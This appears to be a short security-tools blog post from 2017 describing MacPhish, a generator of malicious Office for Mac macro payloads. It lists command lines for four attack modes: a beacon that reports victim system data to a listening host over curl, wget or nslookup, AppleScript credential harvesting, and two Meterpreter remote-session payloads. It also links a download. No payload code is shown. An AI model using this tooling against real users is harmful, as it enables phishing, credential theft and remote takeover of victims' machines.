Man-In-The-Middle

MacPhish – Office for Mac Macro Payload Generator

October 6, 2017

1 Min Read

Mazen Elzanaty MazenElzanaty MazenElzanaty MazenElzanaty

Attack vectors

There are 4 attack vectors available:

beacon
creds
meterpreter
meterpreter-grant

For the ‘creds’ method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host>

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Download MacPhish

TagsMac Macro Payload Mac Macro Payload Generator MacPhish MITM Office for Mac Macro Office for Mac Macro Payload Office for Mac Macro Payload Generator Payload generator

About the author

Mazen Elzanaty

Add Comment

Click here to post a comment

Cancel reply

Sniffer – Packet Trace Parser

Bettercap – Extensible MITM Framework